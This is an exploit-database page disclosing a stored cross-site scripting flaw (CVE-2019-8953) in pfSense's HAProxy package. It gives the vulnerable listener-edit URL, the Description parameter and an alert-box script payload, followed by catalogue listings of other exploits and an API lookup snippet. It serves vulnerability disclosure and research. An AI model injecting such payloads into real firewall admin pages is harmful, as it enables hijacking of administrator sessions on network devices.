Menu

"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting"

Author

"Gionathan Reale"

Platform

php

Release date

2019-03-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
# Date: 13.02.2019 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.pfsense.org 
# Version: 2.4.4-p1/0.59_14 
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953 

################################################################################################################################## 
Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
################################################################################# 

Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
PARAMETER Description 
PAYLOAD "><script>alert("test")</script>
Release Date Title Type Platform Author
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
2019-08-02 "1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting" webapps php "Kusol Watchara-Apanukorn"
2019-08-02 "Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection" webapps php n1x_
2019-08-02 "Sar2HTML 3.2.1 - Remote Command Execution" webapps php "Cemal Cihad ÇİFTÇİ"
2019-08-01 "WebIncorp ERP - SQL injection" webapps php n1x_
Release Date Title Type Platform Author
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2018-12-11 "LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)" dos windows "Gionathan Reale"
2018-12-09 "Textpad 8.1.2 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-06 "Wavemaker Studio 6.6 - Server-Side Request Forgery" webapps java "Gionathan Reale"
2018-09-25 "Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-14 "Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-13 "Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-13 "Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)" local windows "Gionathan Reale"
2018-09-07 "iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-08-23 "StyleWriter 4 1.0 - Denial of Service (PoC)" local windows_x86 "Gionathan Reale"
2018-08-14 "Wansview 1.0.2 - Denial of Service (PoC)" local windows_x86-64 "Gionathan Reale"
2018-09-26 "CrossFont 7.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "TransMac 12.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-17 "XAMPP Control Panel 3.2.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-14 "Faleemi Plus 1.0.2 - Denial of Service (PoC)" dos windows_x86-64 "Gionathan Reale"
2018-09-14 "InfraRecorder 0.53 - '.txt' Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "PDF Explorer 1.5.66.2 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "iCash 7.6.5 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "PicaJet FX 2.6.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "RoboImport 1.2.0.72 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "PixGPS 1.1.8 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "jiNa OCR Image to Text 1.0 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-10 "Zenmap (Nmap) 7.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Easy PhotoResQ 1.0 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Drive Power Manager 1.10 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "HD Tune Pro 5.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46538/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46538/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46538/40987/pfsense-244-p1-haproxy-package-059-14-persistent-cross-site-scripting/download/", "exploit_id": "46538", "exploit_description": "\"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting\"", "exploit_date": "2019-03-13", "exploit_author": "\"Gionathan Reale\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse